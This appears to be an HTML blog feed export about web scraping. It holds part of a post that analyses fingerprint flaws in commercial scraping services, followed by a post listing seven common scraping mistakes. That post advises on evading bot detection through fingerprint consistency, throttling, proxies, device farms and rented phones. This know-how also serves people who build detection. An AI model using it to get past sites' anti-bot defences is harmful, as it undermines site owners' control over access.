<span class="w"> </span><span class="nt">"window.innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">1340</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.width"</span><span class="p">:</span><span class="w"> </span><span class="mi">2560</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.height"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>It should not be the case that the <code>window.outerWidth</code> and <code>window.outerHeight</code> properties are smaller than
the <code>window.innerWidth</code> and <code>window.innerWidth</code> screen dimensions. This is a very strong indication
that the browser was messed with.</p>
<p>Furthermore, their scrapers don't have any plugin information (<code>navigator.plugins</code>) associated with them. This is very uncommon for legit Chrome browses. Usually, every Chrome browser has standard plugin information such as </p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Plugin"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Portable Document Format"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-google-chrome-pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Viewer"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Native Client"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-nacl"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>With <code>scrapingrobot.com</code>, this information looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>Another issue with the scrapers of <code>scrapingrobot.com</code> is that they don't have any multimedia devices (<code>navigator.mediaDevices</code>) associated with the browser. Usually, a normal browser has at least one multimedia device associated (such as speakers, micros, webcams).</p>
<p>Normal:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>scrapingrobot.com:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<h2>Detecting <a href="https://scrapfly.io">scrapfly.io</a></h2>
<p>The fingerprints recorded are as follows:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>TCP/IP fingerprint</th>
<th>canvas fingerprint</th>
<th>WebGL fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>75957d6c70a68c4d716e986554e313d4</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>210181aae7512e1e68c4058fa330c040</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>2c901d174dc4faf1b3c7e71e7a963d62</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>a841a8e49dca94195ad161674c9762fa</td>
<td>7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>52d35b65383ae737bd6d735078d59b20</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>Based on the fingerprints, we cannot state much. The browser fingerprint is different for every collected sample. This is already a good sign.</p>
<p>Maybe it is noteworthy to state that the TCP/IP fingerprint is releatively likely from an Linux based operating system and not from an Mac OS operating system as their User-Agent claims to be.</p>
<p>The canvas and WebGL fingerprint are always the same. Those fingerprints don't convey much entropy, hence it is not easy to say that the samples are all conducted from the same scraping software.</p>
<p>They seem to have created a overall good service. Unfortunately, they made some mistakes regarding the <code>navigator</code> property.</p>
<p>The User-Agent in the http headers is not the same as the user agent in the <code>navigator</code> property:</p>
<ol>
<li><strong>HTTP User-Agent:</strong> <em>Mozilla/5.0 (X11; Linux x86_64; x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</em></li>
<li><strong><code>navigator</code> User-Agent:</strong> <em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</em></li>
</ol>
<p>This is a very obvious mistake and this would result in a ban immediately with many anti bot systems.</p>
<p>Furthermore, they always spoof the same graphic card:</p>
<div class="highlight"><pre><span></span><code> <span class="s2">"videoCard"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"Google Inc."</span><span class="p">,</span>
<span class="s2">"ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)"</span>
<span class="p">],</span>
</code></pre></div>
<p>Every browser they use has the same string <em>ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)</em> as their video card name.</p>
<p>Another issue is that their scraping browser does not have a single multimedia device attached to it:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">},</span>
</code></pre></div>
<p>Did you ever come accross a Macintosh Computer without micro, speaker or webcam? Nope, I haven't.</p>
<p>Another mistake they make is to not set the <code>navigator.plugins</code> property at all:</p>
<div class="highlight"><pre><span></span><code> <span class="s2">"plugins"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s2">"mimeTypes"</span><span class="o">:</span> <span class="p">[],</span>
</code></pre></div>
<p>Real browsers always have some standard values here.</p>
<p>Another issue with <a href="https://scrapfly.io">scrapfly.io</a> is that all their HTTP requests come equipped with the <code>X-Amzn-Trace-Id</code> HTTP header set by all outgoing http requests originating from <a href="https://aws.amazon.com/premiumsupport/knowledge-center/trace-elb-x-amzn-trace-id/">Amazon AWS</a>. This feature allows to trace http sessions for debugging reasons.</p>7 Common Mistakes in Professional Scraping2021-03-01T23:13:00+01:002021-03-03T18:30:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-01:/2021/03/01/7-common-mistakes-in-professional-scraping/<p>In this blog post, I am talking about my several year long experience with web scraping and common mistakes I made along the road. The more I dive into web scraping, the more I realize how easy it is to take wrong decisions when scraping a site. For that reason, I compiled a list of seven common mistakes in regard to web scraping.</p><p>The seven scraping commandments <a style="font-size: 70%" href="https://www.youtube.com/watch?v=ZYb_8MM1tGQ">[1]</a></p>
<ol>
<li><a href="#lie">Don't Lie about your User Agent</a></li>
<li><a href="#speed">Don't scrape too aggressively</a></li>
<li><a href="#serverless">Pick the right choice of scraping/crawling architecture that matches your needs</a></li>
<li><a href="#mistakes">Learn from Mistakes from Professional Scraping Services</a></li>
<li><a href="#fingerprinting">Don't disregard Fingerprinting</a></li>
<li><a href="#behavior">Be Aware of Behavioral UI Analysis</a></li>
<li><a href="#sideChannel">Side Channel Attacks can Reveal that you are a Bot</a></li>
</ol>
<h2>Introduction</h2>
<p>I have been creating scrapers since years. Most of them were quite rubbish. But in the painful process you learn from some common mistakes. In this blog post, I share some of the most frequent mistakes that I spot in the wild and that I made myself. Furthermore, I give general advice how to remain (somewhat) undetected when scraping.</p>
<p>Mandatory note: Many large websites actually don't sanction scraping that much. I would count <a href="https://www.google.com/">Google</a> and <a href="https://www.amazon.com/">Amazon</a> to the sites that only moderately prevent scraping. The reason is obvious: Those platforms actually massively profit when other people/companies are using their data in their products. Google and Amazon are heavy players when it comes to E-Commerce and Online Marketing. So they both have an incentive to allow third-party-tools to access their platforms to a certain degree.</p>
<p>Other sites such as Instagram and LinkedIn are much more aggressive when it comes to blocking scrapers. They'll ban ill behaving user agents on the first suspicious activity. Websites such as LinkedIn are practically impossible to use without having an account.</p>
<p>Therefore, the advice in this blog post might be too strict or too lax for your specific use case. Keep that in mind.</p>
<p>Furthermore, this advice does not explicitly apply to scraping or crawling. Scraping often has a very negative connotation. </p>
<p>But an increasingly large percentage of people using frameworks such as <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> or <a href="https://github.com/microsoft/playwright">playwright</a> to automate otherwise mundane tasks. Therefore, there are many legit reasons why you want to train your software to navigate websites like a real human being.</p>
<h2>7 Common Mistakes in Professional Scraping</h2>
<h3 id="lie">1. Don't Lie about your User Agent</h3>
<p>If you are scraping with puppeteer and headless chrome on an Amazon EC2 instance and you set your user agent to be an iPhone </p>
<p><em>Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1</em></p>
<p>websites have a million ways to find out that you are lying.</p>
<p>For example, what happens when you forgot to adjust the user agent accordingly in the <code>navigator.userAgent</code> and <code>navigator.appVersion</code> properties? Or what if you forget to spoof the <code>navigator.platform</code> property to the correct iPhone platform?</p>
<p>Those static strings are easy to fix, but the browser exposes such a extremely vast API to websites, which is impossible to fix in its entirety.</p>
<p>It is much harder to fix the following things to behave like a true iPhone device:</p>
<ul>
<li>WebGL rendering and audio fingerprints</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Permissions_API">Permissions API</a>, iOS devices have a very unique permissions restrictions </li>
<li>Correct <a href="https://developer.mozilla.org/en-US/docs/Web/API/Screen">screen dimensions</a>. And I mean ALL OF THEM.</li>
<li>mobile touch events emulation</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Battery_Status_API">battery status API</a></li>
<li><code>deviceorientation</code> and <code>devicemotion</code> events </li>
</ul>
<p>And there are many other APIs that behave different on an iPhone compared to other mobile devices.</p>
<p>The following websites are quite good in detecting such inconsistencies: </p>
<ol>
<li><a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a></li>
<li><a href="http://pixelscan.net/checkproxy/">pixelscan.net</a></li>
<li><a href="https://bot.incolumitas.com/">bot.incolumitas.com</a> (yeah I know)</li>
</ol>
<p>It is just extremely hard to convincingly pretend you are an iPhone when in reality you are a headless chrome browser in some cloud infrastructure.</p>
<p>For example, when you run the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">webkit</span><span class="p">,</span> <span class="nx">devices</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'playwright'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">androidDevice</span> <span class="o">=</span> <span class="nx">devices</span><span class="p">[</span><span class="s1">'Pixel 2 XL'</span><span class="p">];</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">webkit</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span><span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">});</span>
<span class="kd">const</span> <span class="nx">context</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newContext</span><span class="p">({</span>
<span class="p">...</span><span class="nx">androidDevice</span><span class="p">,</span>
<span class="nx">locale</span><span class="o">:</span> <span class="s1">'en-US'</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">context</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://bot.incolumitas.com/'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'botOrNot.png'</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<p>you will find so many cues whey the user agent just can't possibly be a real Pixel smartphone.</p>
<p>What to do instead? </p>
<p>I'd suggest to not lie on the user agent that you <em>truly</em> are. If your automated browser is running on a Linux system in the cloud, don't alter your user agent. Although Linux systems are quite rare in the wild, they are still legit user agents that websites should not block.</p>
<h3 id="speed">2. Don't scrape too aggressively</h3>
<p>This is another common mistakes I see people making. Don't scrape too aggressively. After all, you are interested in public data, you don't want to launch a Denial of Service attack against a website. So please be considerate. </p>
<p>Furthermore, if your scraping becomes a major pain for the websites administrators, they will be extra careful to block all illegitimate traffic.</p>
<p>So it's better to throttle your scraping and to stay below the radar.</p>
<h3 id="serverless">3. Pick the right choice of scraping/crawling architecture that matches your needs</h3>
<p>In the past, I used <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> for many larger scraping projects. I managed to scrape millions of Google SERPs within days on AWS Lambda (Even without any external proxies. Just by using the AWS Lambda public IP address pool, I was good to go).</p>
<p>There exist <a href="https://github.com/alixaxel/chrome-aws-lambda">mature Node.js modules</a> that ship chromium binaries specifically compiled for the AWS Lambda runtime.</p>
<p>But in order to run the chrome browser on AWS Lambda, you need to launch the chrome browser with many special <a href="https://github.com/alixaxel/chrome-aws-lambda/blob/master/source/index.js">command line arguments</a>:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Returns a list of recommended additional Chromium flags.</span>
<span class="cm"> */</span>
<span class="k">static</span> <span class="nx">get</span> <span class="nx">args</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--autoplay-policy=user-gesture-required'</span><span class="p">,</span>
<span class="s1">'--disable-background-networking'</span><span class="p">,</span>
<span class="s1">'--disable-background-timer-throttling'</span><span class="p">,</span>
<span class="s1">'--disable-backgrounding-occluded-windows'</span><span class="p">,</span>
<span class="s1">'--disable-breakpad'</span><span class="p">,</span>
<span class="s1">'--disable-client-side-phishing-detection'</span><span class="p">,</span>
<span class="s1">'--disable-component-update'</span><span class="p">,</span>
<span class="s1">'--disable-default-apps'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-domain-reliability'</span><span class="p">,</span>
<span class="s1">'--disable-extensions'</span><span class="p">,</span>
<span class="s1">'--disable-features=AudioServiceOutOfProcess'</span><span class="p">,</span>
<span class="s1">'--disable-hang-monitor'</span><span class="p">,</span>
<span class="s1">'--disable-ipc-flooding-protection'</span><span class="p">,</span>
<span class="s1">'--disable-notifications'</span><span class="p">,</span>
<span class="s1">'--disable-offer-store-unmasked-wallet-cards'</span><span class="p">,</span>
<span class="s1">'--disable-popup-blocking'</span><span class="p">,</span>
<span class="s1">'--disable-print-preview'</span><span class="p">,</span>
<span class="s1">'--disable-prompt-on-repost'</span><span class="p">,</span>
<span class="s1">'--disable-renderer-backgrounding'</span><span class="p">,</span>
<span class="s1">'--disable-setuid-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-speech-api'</span><span class="p">,</span>
<span class="s1">'--disable-sync'</span><span class="p">,</span>
<span class="s1">'--disk-cache-size=33554432'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="s1">'--ignore-gpu-blocklist'</span><span class="p">,</span>
<span class="s1">'--metrics-recording-only'</span><span class="p">,</span>
<span class="s1">'--mute-audio'</span><span class="p">,</span>
<span class="s1">'--no-default-browser-check'</span><span class="p">,</span>
<span class="s1">'--no-first-run'</span><span class="p">,</span>
<span class="s1">'--no-pings'</span><span class="p">,</span>
<span class="s1">'--no-sandbox'</span><span class="p">,</span>
<span class="s1">'--no-zygote'</span><span class="p">,</span>
<span class="s1">'--password-store=basic'</span><span class="p">,</span>
<span class="s1">'--use-gl=swiftshader'</span><span class="p">,</span>
<span class="s1">'--use-mock-keychain'</span><span class="p">,</span>
<span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">Chromium</span><span class="p">.</span><span class="nx">headless</span> <span class="o">===</span> <span class="kc">true</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">result</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--single-process'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">result</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--start-maximized'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>I am quite positive that normal Chrome browsers are not launched with those command line arguments and that it is possible to detect those settings for the websites being visited.</p>
<p>Furthermore, there are just too many disadvantages when scraping with AWS Lambda:</p>
<ul>
<li>The lambda runtime is very restrictive</li>
<li>You have to test every feature twice and double before it works AWS Lambda</li>
<li>It is more expensive then self managed VPS servers</li>
<li>It is a major pain in the ass for debugging</li>
<li>Deployments eat up quite some time </li>
</ul>
<p>In the long run, those disadvantages kill the two or three plus points that lambda brings to the table:</p>
<ul>
<li>AWS Lambda caches state and prevents coldstarts</li>
<li>You only pay for what you use</li>
<li>You do not have to manage servers yourself</li>
</ul>
<h4>How should I setup my scraping/crawling infrastructure then?</h4>
<p>It depends on how strong the anti bot defense of the site you are trying to scrape is.</p>
<p>Nowadays, I would suggest to use something like a proper <a href="https://github.com/browserless/chrome">Google Chrome Docker Image</a> and a cluster management toolchain such as <a href="https://docs.docker.com/engine/swarm/">Docker Swarm</a> or <a href="https://kubernetes.io/">Kubernetes</a> instead and rent out VPS servers as scraping demand increases. Maybe you can use <a href="https://rancher.com/">Rancher</a> and its many VPS vendor integrations to speed up cluster deployments.</p>
<p>Some propositions for possible scraping/crawling architectures in order of increasing anti scraping measures:</p>
<ol>
<li>
<p><strong>No Scraping Defenses</strong> - Use <code>curl</code> and switch User-Agents and other HTTP Headers once in a while...</p>
</li>
<li>
<p><strong>Easy Scraping Target</strong> - If the website is relatively easy to scrape, use AWS Lambda + <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> (with the shipped chromium compiled for the AWS runtime) + <a href="https://www.npmjs.com/package/puppeteer-extra-plugin-stealth">plugin-stealth</a> + some proxy provider</p>
</li>
<li>
<p><strong>Some Anti Scraping Defense</strong> - If you need a real Google Chrome browser <a href="https://github.com/berstend/puppeteer-extra/wiki/Using-Google-Chrome-instead-of-Chromium">for more stealth</a>, use a Docker Image such as the one from <a href="https://github.com/browserless/chrome">browserless.io</a> and rent out VPS servers from a provider such as Digitalocean, AWS EC2 or Hetzner. You can use the raw <a href="https://chromedevtools.github.io/devtools-protocol/">Chrome DevTools Protocol (CDP)</a> for automation.
A good collection of tools that use the CDP <a href="https://github.com/ChromeDevTools/awesome-chrome-devtools">can be found here</a>. Furthermore, you can simulate mouse movements and keyboard events with a UI automation library such as <a href="https://pyautogui.readthedocs.io/en/latest/">PyAutoGUI</a>. Your Docker image should also launch a virtual frame buffer such as <a href="https://www.x.org/releases/X11R7.6/doc/man/man1/Xvfb.1.xhtml">Xvfb</a> to simulate a graphical user interface.</p>
</li>
<li>
<p><strong>Advanced Anti Scraping Defense</strong> - If the above setup is still not enough, you can rent out physical devices and conduct your scraping there. You can rent real devices for browser testing on sites such as <a href="https://www.browserstack.com/">browserstack.com</a> or <a href="https://aws.amazon.com/device-farm/">AWS Device Farm</a>. It's best to also rent proxies, since the default IP addresses are probably already flagged.</p>
</li>
<li>
<p><strong>Brutal Anti Scraping Defense</strong> - As a final measure, if all of the above fails, you could of course buy your own collection of Android mobile devices and mount a cheap Internet data plan. Then there is nothing to block, because you are a real device after all without pretending to be something else ;) You can buy <a href="https://www.amazon.com/RCA-Android-Unlocked-Smartphone-Black/dp/B086G9NF1P/">cheap Android devices</a> starting from 69USD and a simple 10GB data plan should not cost more than 10$ a month. You can then install a lightweight Android distribution such as <a href="https://www.android.com/versions/go-edition/">Android Go</a> and then you are good to go.
With a 4G connection, your IP address is automatically changed whenever you switch Airplane mode on/off. I currently do not have an exact idea how to automate the scraping there, but it looks like <a href="https://appium.io/">appium.io</a> might be a solution. Anyhow, it is important to humanize all interactions with the browser/apps there as well.</p>
</li>
</ol>
<h3 id="mistakes">4. Learn from Mistakes from Professional Scraping Services</h3>
<p>There are many professional scraping services that you can research. They have learned over the years and you can see how they camouflage they scrapers. Sometimes even the professional services make mistakes though.</p>
<h4><a href="https://scrapingbee.com">ScrapingBee</a></h4>
<p>For example they set the user agent to either </p>
<ol>
<li><em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</em></li>
</ol>
<p>but they forget to spoof the <code>navigator.platform</code> property accordingly. It is still set to <code>"platform": "Linux x86_64"</code>. Obviously, that is very suspicious and would get flagged by many bot detection software.</p>
<h4><a href="https://www.scraperapi.com/">scraperapi.com</a></h4>
<p>This is another commercial scraping service. Their scrapers also exhibit some weird behavior.</p>
<p>For example, their scraping browsers have the timezone set to <code>Etc/Unknown</code>. This is very obscure.</p>
<p>You can obtain the timezone with the JavaScript snippet <code>(new window.Intl.DateTimeFormat).resolvedOptions().timeZone</code>. </p>
<p>Furthermore, the scraperapi.com scrapers have no WebGL support. It is not possible to obtain the video card settings.</p>
<p>Usually, normal browsers have a video card such as:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"videoCard"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Inc."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Iris OpenGL Engine"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>You can obtain your video card brand names with the following script:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">getVideoCardInfo</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">gl</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'canvas'</span><span class="p">).</span><span class="nx">getContext</span><span class="p">(</span><span class="s1">'webgl'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">gl</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no webgl"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">debugInfo</span> <span class="o">=</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getExtension</span><span class="p">(</span><span class="s1">'WEBGL_debug_renderer_info'</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">){</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">vendor</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_VENDOR_WEBGL</span><span class="p">),</span>
<span class="nx">renderer</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_RENDERER_WEBGL</span><span class="p">),</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no WEBGL_debug_renderer_info"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">})()</span>
</code></pre></div>
<h4><a href="https://scrapingrobot.com">scrapingrobot.com</a></h4>
<p>Some issues with scrapingrobot.com are the following:</p>
<p>The scrapers of scrapingrobot.com are using the following screen size properties:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"dimensions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">2470</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">1340</span><span class="p">,</span><span class="w"></span>
